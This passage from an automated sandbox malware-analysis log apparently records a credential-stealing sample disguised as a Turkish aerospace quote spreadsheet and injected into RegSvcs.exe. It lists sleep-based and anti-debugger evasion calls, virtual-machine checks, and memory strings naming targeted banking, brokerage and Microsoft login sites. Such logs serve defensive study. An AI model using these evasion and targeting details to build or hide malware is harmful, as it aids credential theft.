00000000.00000002.1492217479.000000000129B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599123Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599014Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598793Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596389Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595730Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595514Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595074Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594749Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594639Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1972Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105884
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeAPI coverage: 4.5 %
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0100445A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0100C75C
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100C6D1 FindFirstFileW,FindClose,0_2_0100C6D1
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100EF95
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100F0F2
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100F3F3
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_010037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_010037EF
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01003B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01003B12
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100BCBC
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FA49A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599123Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599014Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598793Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596389Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595730Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595514Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595074Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594749Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594639Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594312Jump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3939561592.0000000000908000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeAPI call chain: ExitProcess graph end nodegraph_0-104309
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01013F09 BlockInput,0_2_01013F09
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FA3B3A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FD5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00FD5A7C
